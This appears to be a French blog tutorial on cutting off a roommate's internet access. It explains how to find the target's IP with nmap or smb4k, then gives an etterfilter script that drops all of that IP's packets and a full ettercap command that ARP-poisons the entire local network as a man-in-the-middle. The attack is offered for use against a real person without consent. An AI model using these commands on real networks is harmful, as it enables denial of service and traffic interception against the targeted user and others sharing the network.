Conditions : L'astuce n'est valide qu'avec IPv4.

Requis :
  • GNU/Linux
  • ettercap
Optionnel :
  • nmap
  • Smb4k
Connaître l'IP de votre voisin :
Si vous connaissez déjà l'IP de votre cyber-tyran de colloc, passez à la suite. Sinon vous pouvez utiliser différents logiciels et il en existe une quantité de moyen pour arriver à cette fin.

En voici deux exemples rapides :

- Smb4k :
Avec le logiciel smb4k, on peut voir facilement et rapidement une cartographie du réseaux netbios (partage de fichier windows) afin de repérer le nom et donc l'ip votre voisin. Cet outil est graphique mais il existe l'equivalent en une ligne de commande.

- Nmap :
Un outil que j'adore et que j'utilise énormément (mais très mal) et qui se nomme Nmap. Ce logiciel est un scanneur de ports multifonction, véritable couteau suisse des bricoleurs virtuels.
Voici la commande pour pingé un range d'ip. Notons que le range sera rapide à scanner car de catégorie C (réseaux de particuliers).

Connaître votre Range : route

Pingé ce range : nmap -sP RANGE/24
A noter que le range sera sur 24 bits pour un réseau C.

Principe

Je vous invite à consulter la documentation pour comprendre comment ca marche via les liens que je met en annexes du billet.
Le principe de cette astuce consiste à positionner entre le fauteur de trouble et le routeur puis de "jeter" tous ce qui passe devant votre nez. Pour se faire, nous allons utiliser le logiciel ettercap que nous allons lancer avec un petit script qui se chargera de "jeter" les paquets provenant/allant vers le pc de votre méchant colloc.

Le script
Creez un fichier et ouvrez le avec un editeur de texte (vim/emacs/gedit/kedit anything else...) et copier coller sans scrupule ces quelques lignes en replacant "[@IP_DU_MECHANT_COLLOC]" par l'adresse ip de votre colloc :

if (ip.src == '[@IP_DU_MECHANT_COLLOC]') {
    kill();
    drop();
    msg("Try from IP\n");
}


Sauvegardez le fichier puis ensuite, lancez la compilation du script qui en fait est donc du code :
etterfilter [MONFICHIER] -o [MONBINAIRE]

Il ne vous reste plus qu'a lancer ettercap avec en parametres votre script :
ettercap -i [INTERFACE_RESEAU_ETH] [OPTIONS] [CIBLE] [SOURCE] -F [MONBINAIRE]

Exemple :
ettercap -i eth2 -Tq -M arp // // -F kill.ef

Je vous invite à consulter le man si vous voulez en savoir plus sur le programme ettercap mais pour résumer ce que fais l'exemple :
-i eth2 : lance sur l'interface eth2
-Tq : lance ettercap en mode texte
-M : Mode ManInTheMiddle (cf liens annexes)
arp : utilisation du protocole ARP (cf liens annexes)
// // : de tous le monde pour tous le monde, pas forcément necessaire de "ARPpoisonné" tout le monde pour seulement un PC...
-F kill.ef : lance notre script kill.ef

Conclusion ;
Et voilà ! Vous avez tout en main pour vous reprendre la main sur une connexion digne de ce nom. Je réponds à vos questions vos volontiers. Bonne chance !

Liens annexes :
- IronGeek : Toutes les choses possibles avec ettercap
- Wikipedia : attaque de l'homme du milieu (ManInTheMiddle)
- Wikipedia : ettercap
- Wikipedia : Arp poisoning